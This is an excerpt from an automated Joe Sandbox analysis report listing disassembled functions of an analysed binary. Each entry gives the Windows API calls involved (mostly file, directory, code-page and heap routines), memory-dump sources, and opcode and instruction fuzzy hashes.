                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: Thread$CreatePriority__vswprintf_c_l
                    • String ID: CreateThread failed
                    • API String ID: 2655393344-3849766595
                    • Opcode ID: cb84619782d8d2380c359fc4e96a6ed54375172f00db4f09bd4af421795fae43
                    • Instruction ID: 5a8c28259213c4dbc06a5c16172af380de5871a3a73c76d1de90be20ae496478
                    • Opcode Fuzzy Hash: cb84619782d8d2380c359fc4e96a6ed54375172f00db4f09bd4af421795fae43
                    • Instruction Fuzzy Hash: FF01D6B62487026FD6206F54DC86F6673E8EB41715F1102AFF796971D0CEA168408624
                    APIs
                    • GetStdHandle.KERNEL32(000000F5,?,?,?,?,00B6E79B,00000001,?,?,?,00000000,00B766C2,?,?,?), ref: 00B6B22E
                    • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,00B766C2,?,?,?,?,?,00B76184,?), ref: 00B6B275
                    • WriteFile.KERNELBASE(0000001D,?,?,?,00000000,?,00000001,?,?,?,?,00B6E79B,00000001,?,?), ref: 00B6B2A1
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: FileWrite$Handle
                    • String ID:
                    • API String ID: 4209713984-0
                    • Opcode ID: ed3b029c5a1c11a1f48ca4a77c5841e11fa0ef008c58a9b07821b5659b7443d9
                    • Instruction ID: 2aa0b653fb3a14d3d40ffd15ea70b0b9e998df6e9e076bab0c8b71078eaa02cc
                    • Opcode Fuzzy Hash: ed3b029c5a1c11a1f48ca4a77c5841e11fa0ef008c58a9b07821b5659b7443d9
                    • Instruction Fuzzy Hash: F831B132248305AFDB14CF10D968F6E7BF5FB81715F04495DF981A7290CB78A988CBA2
                    APIs
                      • Part of subcall function 00B6D68B: _wcslen.LIBCMT ref: 00B6D691
                    • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,00B6B405,?,00000001,00000000,?,?), ref: 00B6B569
                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,00B6B405,?,00000001,00000000,?,?), ref: 00B6B59C
                    • GetLastError.KERNEL32(?,?,?,?,00B6B405,?,00000001,00000000,?,?), ref: 00B6B5B9
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: CreateDirectory$ErrorLast_wcslen
                    • String ID:
                    • API String ID: 2260680371-0
                    • Opcode ID: c6471df4dcc75bc73eb7626ab108af1b2a46e518ab2e2a7de7a6aa46298a1497
                    • Instruction ID: 874f84308408f66d1ba40cbd05da6b676d0fb15ad7f68d330419937ebbc55559
                    • Opcode Fuzzy Hash: c6471df4dcc75bc73eb7626ab108af1b2a46e518ab2e2a7de7a6aa46298a1497
                    • Instruction Fuzzy Hash: 0201B5312042206AEF216B749C75FFE32E8DF2A780F044495FA03D6081DB5CDAC286A5
                    APIs
                    • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 00B8CA78
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: Info
                    • String ID:
                    • API String ID: 1807457897-3916222277
                    • Opcode ID: 8c3d7b9ee0205a5b7c3d0863452b749832e0ff81a62ca268f9ec22074798465e
                    • Instruction ID: 269a15ba986c855fe63ed97ef98592002759bc1c04f8bfc077be1a5598e3f5f6
                    • Opcode Fuzzy Hash: 8c3d7b9ee0205a5b7c3d0863452b749832e0ff81a62ca268f9ec22074798465e
                    • Instruction Fuzzy Hash: 4E4126B150468C9EDB269E24CC85AF6BFF9EB45304F1408EDE58A87162D235AE45DF30
                    APIs
                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,62E85006,00000001,?,000000FF), ref: 00B8C19D
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: String
                    • String ID: LCMapStringEx
                    • API String ID: 2568140703-3893581201
                    • Opcode ID: 39203c0684857188945f3e14d10ade9c13e3920b69117ca2fe26da550e5165bc
                    • Instruction ID: 2051fbbb2ad81b7394f23acfda16e3687a90df6d8db599f4a3e7e3b4152e98da
                    • Opcode Fuzzy Hash: 39203c0684857188945f3e14d10ade9c13e3920b69117ca2fe26da550e5165bc
                    • Instruction Fuzzy Hash: 1D01C272541109BBCF02AFA0DC06DAE7FA2EB09750F054595BE1826171CB369961EF90
                    APIs
                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00B8B72F), ref: 00B8C115
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: CountCriticalInitializeSectionSpin
                    • String ID: InitializeCriticalSectionEx
                    • API String ID: 2593887523-3084827643
                    • Opcode ID: 2efedbc28802941504e65db4292e6d08f524829736085bd9de945d315485b70a
                    • Instruction ID: 7d2a040b8f65ae6b1d16de694467377a154533da0084fe4870b563523854a206
                    • Opcode Fuzzy Hash: 2efedbc28802941504e65db4292e6d08f524829736085bd9de945d315485b70a
                    • Instruction Fuzzy Hash: 3CF0BE71A41218BBCF11BF60CC06CAE7FE1EB197A0B0040A6FC196A271CF319D11EB94
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: Alloc
                    • String ID: FlsAlloc
                    • API String ID: 2773662609-671089009
                    • Opcode ID: 5a51ee3fa8648b3a8fa038e090f49c44ec569f0f5bcb5dbf678607e36bdbb8ac
                    • Instruction ID: 67c738ad130c1bfc5599b4bac37934d98312d19cd6b76c62ee4f95bb51a2b3f5
                    • Opcode Fuzzy Hash: 5a51ee3fa8648b3a8fa038e090f49c44ec569f0f5bcb5dbf678607e36bdbb8ac
                    • Instruction Fuzzy Hash: B4E0E531640218AB8A007B649D02D7EBBD5DB19B20F1101EAFD15A7270CF716D02DBDA
                    APIs
                    • ___delayLoadHelper2@8.DELAYIMP ref: 00B7FD6A
                      • Part of subcall function 00B7F9E9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B7FA5C
                      • Part of subcall function 00B7F9E9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B7FA6D
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                    • String ID: 3Uo
                    • API String ID: 1269201914-397643623
                    • Opcode ID: 1408c440295d749bde76bfc8a2151c3cc51ff2d19f73d080c22cea6e4b6e480c
                    • Instruction ID: 56414d609b789cb507a27d70a0af6c37cbf81f3f2f43047dfa83999f739f473d
                    • Opcode Fuzzy Hash: 1408c440295d749bde76bfc8a2151c3cc51ff2d19f73d080c22cea6e4b6e480c
                    • Instruction Fuzzy Hash: 4DB012932685027F372421512C03F3601CCC4C0B11330C5FEF016C0040A4406C840036
                    APIs
                      • Part of subcall function 00B8C97B: GetOEMCP.KERNEL32(00000000,?,?,00B8CC04,?), ref: 00B8C9A6
                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00B8CC49,?,00000000), ref: 00B8CE24
                    • GetCPInfo.KERNEL32(00000000,00B8CC49,?,?,?,00B8CC49,?,00000000), ref: 00B8CE37
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: CodeInfoPageValid
                    • String ID:
                    • API String ID: 546120528-0
                    • Opcode ID: 4acd884430c4aa73017404e3642d5bb2088985718e665294780633689279f39b
                    • Instruction ID: 7868689ef556c3543fb4ae9d00259b896eae371c763028c5cb17e727d89469ad
                    • Opcode Fuzzy Hash: 4acd884430c4aa73017404e3642d5bb2088985718e665294780633689279f39b
                    • Instruction Fuzzy Hash: 3A51F3B19042059EEB21BF75C8816BBBFE5EF41300F1484EED19697272D735A94ACBA0
                    APIs
                    • SetFilePointer.KERNELBASE(000000FF,?,?,?,-000018C0,00000000,00000800,?,00B6ACB0,?,?,00000000,?,?,00B69C8B,?), ref: 00B6AE3A
                    • GetLastError.KERNEL32(?,?,00B69C8B,?,?,?,-000018C0,?,-00002908,00000000,-00000880,?,00000000,?,?,00000000), ref: 00B6AE49
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: ErrorFileLastPointer
                    • String ID:
                    • API String ID: 2976181284-0
                    • Opcode ID: 92291d569aed28c3deffb1d9465ccefe0a1dbf8b0197dc053b6524ea972ee900
                    • Instruction ID: 677ad626784e1ee8ceed11bb095935ab6ca7b49db7739282638a807aa168dc33
                    • Opcode Fuzzy Hash: 92291d569aed28c3deffb1d9465ccefe0a1dbf8b0197dc053b6524ea972ee900
                    • Instruction Fuzzy Hash: 0F4115352043459BDF24AF24C9C4AAAB3E5FB48352F2005BAE945A3A50DB79EC85CF53
                    APIs
                      • Part of subcall function 00B8A515: GetLastError.KERNEL32(?,00BA30C4,00B85982,00BA30C4,?,?,00B853FD,?,?,00BA30C4), ref: 00B8A519
                      • Part of subcall function 00B8A515: _free.LIBCMT ref: 00B8A54C
                      • Part of subcall function 00B8A515: SetLastError.KERNEL32(00000000,?,00BA30C4), ref: 00B8A58D
                      • Part of subcall function 00B8A515: _abort.LIBCMT ref: 00B8A593
                      • Part of subcall function 00B8CD0E: _abort.LIBCMT ref: 00B8CD40
                      • Part of subcall function 00B8CD0E: _free.LIBCMT ref: 00B8CD74
                      • Part of subcall function 00B8C97B: GetOEMCP.KERNEL32(00000000,?,?,00B8CC04,?), ref: 00B8C9A6
                    • _free.LIBCMT ref: 00B8CC5F
                    • _free.LIBCMT ref: 00B8CC95
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: _free$ErrorLast_abort
                    • String ID:
                    • API String ID: 2991157371-0
                    • Opcode ID: 32dcbb6fb8844a45e27f333874ecbcd88d0c584c4baafa678ea134d222be18b8
                    • Instruction ID: 588c41e0cdf6bd9aa03af82ad778428f63378dc438fb2d20d790d66f4d730037
                    • Opcode Fuzzy Hash: 32dcbb6fb8844a45e27f333874ecbcd88d0c584c4baafa678ea134d222be18b8
                    • Instruction Fuzzy Hash: CB3193B1904204AFDB10FF69D441AA97FF5EF41720F2540DAE5089B2B1EB769D41DFA0
                    APIs
                    • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00B67ED0,?,?,?,00000000), ref: 00B6B04C
                    • SetFileTime.KERNELBASE(?,?,?,?), ref: 00B6B100
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: File$BuffersFlushTime
                    • String ID:
                    • API String ID: 1392018926-0
                    • Opcode ID: 5e7cf90c17c8d3da4b56eecd0475763d8750ce50daf607cd850c824799f8fdc6
                    • Instruction ID: f66935b8f49730ab9968060f28b7fa12c4de04ec776c2e45fa0cbdeb32949c58
                    • Opcode Fuzzy Hash: 5e7cf90c17c8d3da4b56eecd0475763d8750ce50daf607cd850c824799f8fdc6
                    • Instruction Fuzzy Hash: 9421D0312492419BC714DF64C891EABBFF8EF55304F04499DF4E5C3151E729EA4C9B62
                    APIs
                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00B6B1B7,?,?,00B681FD), ref: 00B6A946
                    • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00B6B1B7,?,?,00B681FD), ref: 00B6A976
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: CreateFile
                    • String ID:
                    • API String ID: 823142352-0
                    • Opcode ID: e8e9e6e0eaf0917233c532da10e541d7654ce8a8b848da785fe547eb571535ad
                    • Instruction ID: 43c6d8ee48aedd5681b2a871539ff0f534af8581a4a2f19b31a27a29d8d76123
                    • Opcode Fuzzy Hash: e8e9e6e0eaf0917233c532da10e541d7654ce8a8b848da785fe547eb571535ad
                    • Instruction Fuzzy Hash: B82122715003446EE7308A29CC88FB376DCEB49360F510A59FAD9D21C1C778A8858A72
                    APIs
                    • __EH_prolog.LIBCMT ref: 00B61F35
                      • Part of subcall function 00B642F1: __EH_prolog.LIBCMT ref: 00B642F6
                    • _wcslen.LIBCMT ref: 00B61FDA
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: H_prolog$_wcslen
                    • String ID:
                    • API String ID: 2838827086-0
                    • Opcode ID: be481e8abc14b64ef1bc3b62619f64304411267ebb32b471361eb3bcd39de86c
                    • Instruction ID: 24b90c878cafed863df69a49645965b4ac1bcc0b6172b1659ce892274cc150a5
                    • Opcode Fuzzy Hash: be481e8abc14b64ef1bc3b62619f64304411267ebb32b471361eb3bcd39de86c
                    • Instruction Fuzzy Hash: D8216D71904219AFCF11AF98C8919EEFBF6FF08300F1448ADF459A72A1C7795951DB50
                    APIs
                    • FreeLibrary.KERNEL32(00000000,00000001,00BC40C4,?,?,?,00B84EF6,00000004,InitializeCriticalSectionEx,00B97424,InitializeCriticalSectionEx,00000000,?,00B84CAD,00BC40C4,00000FA0), ref: 00B84D85
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00B84D8F
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: AddressFreeLibraryProc
                    • String ID:
                    • API String ID: 3013587201-0
                    • Opcode ID: fc223de1c78c4bec9c84cb959f095f4808c7cfe9d7a023803a6c6c0011bf9c4d
                    • Instruction ID: a498ab03ca263b036ce642bf78e6e79de0704108876d9826d056d309b4bbd691
                    • Opcode Fuzzy Hash: fc223de1c78c4bec9c84cb959f095f4808c7cfe9d7a023803a6c6c0011bf9c4d
                    • Instruction Fuzzy Hash: 89118136601516EF8B22EFA4E8909A977E4FB5A35072401B9E915EB260EB30DD01CBD0
                    APIs
                    • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00B6B157
                    • GetLastError.KERNEL32 ref: 00B6B164
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: ErrorFileLastPointer
                    • String ID:
                    • API String ID: 2976181284-0
                    • Opcode ID: 85095501c0656833f851cc257e1b982d8248245846f5f9c13c544872c6f42312
                    • Instruction ID: 75e46f411953834b87154eba0d3e5c9272732d9f14fbb73084003e0aa1b458c9
                    • Opcode Fuzzy Hash: 85095501c0656833f851cc257e1b982d8248245846f5f9c13c544872c6f42312
                    • Instruction Fuzzy Hash: 4811E531660700BBD7359B24C855FA6B3F9FB06360F5046AAE252E31D0D778ED85C750
                    APIs
                    • _free.LIBCMT ref: 00B8A6C5
                      • Part of subcall function 00B8A7FE: RtlAllocateHeap.NTDLL(00000000,?,?,?,00B85594,?,0000015D,?,?,?,?,00B86A70,000000FF,00000000,?,?), ref: 00B8A830
                    • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00BA30C4,00B6187A,?,?,00000007,?,?,?,00B613F2,?,00000000), ref: 00B8A701
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA7000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BC4000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703564964.0000000000BC5000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_b60000_4.jbxd
                    Similarity
                    • API ID: Heap$AllocAllocate_free
                    • String ID:
                    • API String ID: 2447670028-0
                    • Opcode ID: 18d78f32fca0352253ba9d4d47d757e94d79585636a017db44bacdda5a401dd4
                    • Instruction ID: 2e1d5073b7151026682f3b4750131b817ef6bedc82f33eb61e9ebdfe0ca08afe
                    • Opcode Fuzzy Hash: 18d78f32fca0352253ba9d4d47d757e94d79585636a017db44bacdda5a401dd4
                    • Instruction Fuzzy Hash: 82F0C231101101A7BB213A25AC41F6B37E8DF82BB0B284097F815960B4FF25CC10E76B
                    APIs
                    • GetCurrentProcess.KERNEL32(?,?), ref: 00B723CA
                    • GetProcessAffinityMask.KERNEL32(00000000), ref: 00B723D1
                    Memory Dump Source
                    • Source File: 00000001.00000002.1703379145.0000000000B61000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B60000, based on PE: true
                    • Associated: 00000001.00000002.1703363311.0000000000B60000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703408526.0000000000B94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000001.00000002.1703430132.0000000000BA0000.00000004.00000001.01000000.00000009.sdmpDownload File
